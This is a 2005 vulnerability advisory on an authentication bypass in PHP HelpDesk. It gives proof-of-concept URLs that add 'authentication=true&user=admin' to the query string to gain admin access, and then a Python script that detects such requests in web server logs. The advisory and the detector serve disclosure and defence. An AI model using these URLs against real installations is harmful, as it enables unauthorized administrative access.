PHP HelpDesk Authentication Bypass (Exploit)
Saturday, 15 October 2005
Summary
PHP Helpdesk is "a tool that allows administrators to handle tasks related to their organisation. This tool is used to record and monitor the progress of tasks assigned to people. This is an excellent and simple tool for handling tasks". PHP Helpdesk has a flaw in how it implements the cookie values it sets. Using crafted URLs, it is possible to get full access to the system.
Credit:
The information has been provided by Garry Taylor.

Details
Proof of Concept:
Access a site that holds the login to PHP HelpDesk
http://www.target.com/helpdesk/index.php

Change the system so that you are authenticated
http://www.target.com/helpdesk/index.php?authentication=true

Raise your privileges to admin
http://www.target.com/helpdesk/index.php?authentication=true&user=admin
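For administrators checking whether an installation has been accessed this way, requests like the ones above stand out in web server logs because authentication state appears in the query string. The following Python script is an added example, not part of the original advisory; it assumes the Apache/nginx combined log format and the /helpdesk/index.php path shown above, and the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters the advisory shows being supplied in the URL to gain access.
AUTH_PARAMS = {"authentication", "user"}

# Apache/nginx "combined" log format (assumed; adjust for your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def suspicious_params(target):
    """Return the sorted auth-state parameter names present in the query string."""
    # parse_qs percent-decodes names, so encoded variants are caught too.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Names are lowercased so case variants are flagged as well (conservative).
    return sorted(AUTH_PARAMS & {name.lower() for name in query})

def scan(lines, path_suffix="/helpdesk/index.php"):
    """Yield (ip, timestamp, status, params) for requests passing auth state in the URL."""
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        if not urlsplit(m["target"]).path.lower().endswith(path_suffix):
            continue  # request is for some other page
        params = suspicious_params(m["target"])
        if params:
            yield m["ip"], m["ts"], int(m["status"]), params

# Constructed sample log lines (not from a real server).
SAMPLE = [
    '192.0.2.10 - - [15/Oct/2005:10:01:02 +0000] "GET /helpdesk/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [15/Oct/2005:10:03:17 +0000] "GET /helpdesk/index.php?authentication=true HTTP/1.1" 200 7310 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [15/Oct/2005:10:03:40 +0000] "GET /helpdesk/index.php?Authentication=true&user=admin HTTP/1.1" 200 9944 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [15/Oct/2005:10:05:00 +0000] "GET /helpdesk/index.php?page=tickets HTTP/1.1" 200 4100 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with a 200 status is worth correlating with later activity from the same address; the same parameters sent in a POST body or a Cookie header would not appear in an access log and need application-level logging.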